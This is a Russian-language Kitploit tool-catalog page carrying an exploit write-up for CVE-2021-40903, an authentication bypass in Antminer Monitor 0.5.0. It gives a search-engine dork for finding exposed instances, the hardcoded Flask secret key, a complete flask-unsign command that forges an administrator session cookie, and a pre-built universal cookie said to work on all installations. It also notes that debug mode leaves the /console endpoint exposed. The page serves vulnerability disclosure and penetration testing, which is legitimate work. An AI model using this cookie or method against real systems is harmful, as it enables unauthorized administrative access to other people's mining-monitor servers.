Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
Инструменты/GitHubGitHub/vulnz/cve-2021-40903
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

Репозиторий
34 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название эксплойта: Antminer Monitor 0.5.0 - Обход аутентификации

CVE: CVE-2021-40903

Дата: 09/06/2021

Дорк:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 Автор эксплойта: CQR.company / Vulnz.

Домашняя страница производителя: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

Ссылка на программное обеспечение: https://github.com/anselal/antminer-monitor, https://soulis.tech/

Версия: 0.5.0

Протестировано на: Windows, Linux, Macos

Программное обеспечение обычно используется для мониторинга Antminer и может быть легко найдено в zoomeye ( 800), shodan ( 500). На данный момент это самый популярный инструмент мониторинга Antminer. Уязвимость в Antminer Monitor существует из-за бэкдора или неправильной конфигурации, выполненной

разработчиком в файле настроек flask-сервера.

Файл настроек содержит предопределённую секретную строку, которая должна генерироваться случайным образом, однако она статична в этой build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

Секретный ключ — 'super secret key'.

Основываясь на этой информации, мы можем создать cookie для обхода авторизации.

Используя программное обеспечение flask-unsing, мы можем сгенерировать cookie, который предоставит вам доступ администратора.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" Кроме того, вы можете использовать этот универсальный cookie для доступа к веб-интерфейсу flask-приложения.

Этот cookie может работать на всех системах в поле «session».

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

Кроме того, DEBUG = True, что означает, что /console работает, однако для него требуется PIN-код.

Скачать инструмент